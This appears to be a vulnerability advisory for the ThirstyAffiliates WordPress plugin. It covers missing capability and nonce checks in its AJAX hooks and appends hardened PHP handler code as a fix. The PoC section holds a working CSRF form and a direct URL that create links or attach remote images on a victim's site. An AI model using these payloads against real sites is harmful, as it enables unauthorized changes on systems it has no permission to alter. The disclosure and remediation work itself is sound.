ThirstyAffiliates [Multiple Vulnerabilities]

Description

IMPORTANT: Some, if not all, of these issues were reported to the plugin author by James Golovich, as stated in the plugin changelog for v2.6.2. I asked James for further clarification, so the content of this report might be updated as soon as I have it.

Multiple vulnerabilities were found in the ThirstyAffiliates plugin. The root cause is the lack of capability checks and anti-CSRF (nonce) token checks in the AJAX hooks registered by this plugin.

A registered user account is required to exploit these vulnerabilities because all of the actions are privileged (logged-in only). No specific capability is required, though.

Vulnerable AJAX hooks are:

  1. thirstyExportGlobalSettings
  2. thirstyImportGlobalSettings
  3. thirstyLinkPickerSearch
  4. thirstyUploadImageFromUrl
  5. thirstyAttachImageToLink
  6. thirstyUnattachImageFromLink
  7. thirstyGetLinkCode
  8. thirstyGetThickboxContent
  9. thirstyGetQuickAddLinkThickboxContent
  10. quickCreateAffiliateLink

Actions 1 and 2 export and import the plugin options, so they should be available only to users with administrative rights.

All other actions relate to listing, creating and changing specific links. The plugin author added the requirement for the edit_posts capability to perform those actions in v2.6.2, which is supposed to patch these issues. However, CSRF attacks are still possible for most of those actions because no prevention mechanism (nonce check) is implemented when performing them.

PoC

Direct access

Use the following URL to create arbitrary links: http://sbwp1.dev/wp-admin/admin-ajax.php?action=thirstyGetQuickAddLinkThickboxContent

The form displayed at the above URL actually uses the quickCreateAffiliateLink AJAX action to create links.

CSRF

The following form will upload an image from http://dansilivestru.github.io/phonegap-day-slides/images/pwnage.png and attach it to the post with ID 1.

<form action="http://sbwp1.dev/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="thirstyUploadImageFromUrl" />
    <input type="hidden" name="imgUrl" value="http://dansilivestru.github.io/phonegap-day-slides/images/pwnage.png" />
    <input type="hidden" name="postId" value="1" />
    <input type="submit" value="Click Me" />
</form>

Solution

Capability checks were implemented in v2.6.2, but the CSRF vulnerabilities still exist.
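As an added illustration of the fix the advisory calls for (this is example code, not ThirstyAffiliates' own code), the handlers below show the two guards every privileged admin-ajax.php hook needs: a nonce check, which rejects a cross-site form like the one in the PoC because the attacker cannot obtain the victim's nonce, and a capability check scoped to the action (manage_options for the settings import/export, edit_posts plus a per-post edit_post check for the link actions). Everything prefixed demo_ (hook callbacks, the nonce action name, the 'demo-admin' script handle, and the helpers demo_apply_settings() and demo_sideload_image()) is hypothetical; the wp_ajax_ action names are the ones listed in this advisory, and the WordPress functions used (check_ajax_referer, current_user_can, wp_create_nonce, wp_localize_script, wp_send_json_error/success) are the real core API.

```php
<?php
/*
 * Added example, not plugin code: hardened pattern for the admin-ajax.php
 * handlers named in the advisory. Names prefixed "demo_" are hypothetical.
 */

// 1. Hand the nonce to the admin-side JavaScript so every AJAX call can send it
//    as a "nonce" POST field. 'demo-admin' is a hypothetical script handle.
add_action( 'admin_enqueue_scripts', 'demo_enqueue_ajax_nonce' );
function demo_enqueue_ajax_nonce() {
    wp_localize_script( 'demo-admin', 'demoAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'demo_ajax_nonce' ),
    ) );
}

// 2. Shared guard called first by every privileged handler.
function demo_require( $capability ) {
    // Third argument false: on failure return instead of wp_die(), so we can
    // answer with JSON. A cross-site form cannot supply a valid nonce.
    if ( ! check_ajax_referer( 'demo_ajax_nonce', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'invalid or missing nonce' ) );
    }
    // wp_ajax_* only guarantees a logged-in user; the capability decides who.
    if ( ! current_user_can( $capability ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ) );
    }
}

// 3. Settings import: administrators only.
add_action( 'wp_ajax_thirstyImportGlobalSettings', 'demo_import_global_settings' );
function demo_import_global_settings() {
    demo_require( 'manage_options' );
    $raw     = isset( $_POST['settings'] ) ? wp_unslash( $_POST['settings'] ) : '';
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) ) {
        wp_send_json_error( array( 'message' => 'malformed settings payload' ) );
    }
    demo_apply_settings( $decoded ); // hypothetical: validates each key before update_option()
    wp_send_json_success();
}

// 4. Link-level action: edit_posts, plus a check that the user may edit
//    the specific post the image is attached to (the PoC targets post ID 1).
add_action( 'wp_ajax_thirstyUploadImageFromUrl', 'demo_upload_image_from_url' );
function demo_upload_image_from_url() {
    demo_require( 'edit_posts' );
    $post_id = isset( $_POST['postId'] ) ? absint( $_POST['postId'] ) : 0;
    $img_url = isset( $_POST['imgUrl'] ) ? esc_url_raw( wp_unslash( $_POST['imgUrl'] ) ) : '';

    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'cannot edit this post' ) );
    }
    $scheme = wp_parse_url( $img_url, PHP_URL_SCHEME );
    if ( ! $img_url || ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
        wp_send_json_error( array( 'message' => 'image URL must be http(s)' ) );
    }
    // hypothetical wrapper around the media sideload API; returns an attachment ID
    $attachment_id = demo_sideload_image( $img_url, $post_id );
    wp_send_json_success( array( 'attachment_id' => $attachment_id ) );
}
```

wp_send_json_error() and wp_send_json_success() terminate the request, so each failed guard ends the handler. On the JavaScript side the only change needed is to include nonce: demoAjax.nonce in the POST data of every request; a request that omits it, such as the CSRF form in the PoC, fails the check_ajax_referer() call before any state is changed.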
